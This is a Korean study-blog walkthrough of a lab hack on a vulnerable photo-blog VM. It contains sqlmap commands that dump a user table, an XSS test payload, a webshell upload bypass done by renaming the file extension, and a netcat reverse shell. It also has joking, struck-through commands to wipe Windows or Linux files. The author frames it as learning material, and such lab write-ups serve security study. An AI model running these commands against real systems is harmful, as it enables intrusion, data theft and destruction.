!warning!
본 게시글은 본인의 학습기록을 위해 작성된 알려진 학습 기법
함부로 악의적으로 이용은 엄연히 불법 임으로
절대 시도하지 말 것이며
사고 발생 시 본인은 절대로 책임지지 않습니다!
예고대로 마지막은 큐라레:마법도서관
하겠습니다.
1. 정보 수집
스샷. 1
-파라미터 값이 달라지는 것을 발견
2. SQL 인젝션 공격
스샷. 2
-‘을 입력했을 때 SQL 형식 관련 에러가 발생하는 것을 볼 수 있습니다.
1
|
sqlmap –u http://192.68.37.133/cat.php?id=1’
|
cs |
스샷. 3
– 위 명령어를 통해 sqlmap을 실행시켜 인젝션 공격이 가능한 부분을 탐색,
굵게 표시된 부분을 보니 id 파라미터가 들어가는 곳이 취약한가 봅니다 🙂
스샷. 4
1
|
<script>alert(‘XSS’)</script>
|
cs |
-sql 인젝션 공격과 xss 공격이 가능한 것을 확인할 수 있습니다.
1
|
sqlmap –u http://192.168.56.106/cat.php?id=1 ––current–db
|
cs |
스샷. 5
– 현재 DB의 이름을 알아내고,
1
|
sqlmap –u http://192.168.56.106/cat.php?id=1 –D photoblog ––dump
|
cs |
스샷. 6-7
– DB 내용을 덤프 시키고, USER 테이블로부터 사용자 정보를 탈취했습니다.
3. 파일 업로드 공격
-위에서 탈취한 정보를 통해 로그인 합니다.
스샷. 8-9
-New picture에서 [ add ]를 통해 webshell.php를 업로드해봤으나 실패ōxō
~~-New picture에서 [ add ]를 통해 webshell.php를 업로드해봤으나 실패ōxō~~
1
|
mv webshell.php webshell.PHP
|
cs |
-웹쉘 확장자명을 바꿔서 업로드 성공
– 이렇게 해서 사실상 타깃 시스템에 접근 성공했습니다. 이젠
– 이런 식으로 타깃의 시스템을 가지고 놀거나
– 아니면 루트권한까지 접근해서 아예
추가 정보들을 탈취하고
탈주빤스런하시던가
-파계승으로 빙의해서 타깃 시스템을 신나게 파괴하시면 됩니다 ㅋㅅㅋ;
~~cmd /c rd /s /q c:\//윈도우~~
~~or~~
~~cd /home/user/test 후 rm -rf ./*//리눅스~~
4. 리버스 쉘 침투
1
|
nc –lvnp 4000
|
cs |
-먼저 터미널 하나에 리스닝 포트 열어제껴둡니다.
1
|
nc 192.168.37.116 4000 –e /bin/sh
|
cs |
– 이렇게 리버스 쉘 침투 가 성공했습니다. 위 스크린샷처럼 가지고 놀거나
– 루트 추가 권한 까지 접근해서 추가정보들을 탈취하고 탈주하시면 됩니다. 🙂
=====================================
드리어 마지막 챕터까지 작성이 끝났습니다. (*´∀`)
휴… 아예 작성 못할줄 알았는데 하늘이 도왔군요
이젠 원하지 않는 분야로 아르바이트를 하게 되어도
두고두고 소정의 시간 마다 망각하지 않겠네요ε-(´・`)
이젠 이 기초단계의 책에서 하산하고 다음 Level
로 가야겠습니다. (✿╹◡╹)
해킹 분야같은 경우 이제 부터 시작이니까 말이지요
또 시간이 나면 프로그래밍 언어랑 알고리즘
공부 혹은 코딩테스트 준비하고
(본인 같은경우 개발자 부터 시작해서)
(보안분야로 넘어갈 계획입니다)
그림이나 일러스트 그려야겠습니다 (*´∀`)
내일 시간 나면 편의점으로 처들어가서
이 책을 하산한 기념으로
축배거리 사들고 축배를 들어야겠군요 끌끌…
아무튼 이 장문을 읽어 주신 분들께 다시한번 감사드리고
좋은 하루 되시고,
하시는 일 잘되시길 바람니다. (ㆁᴗㆁ✿)
그리고 코로나 조심하시길…。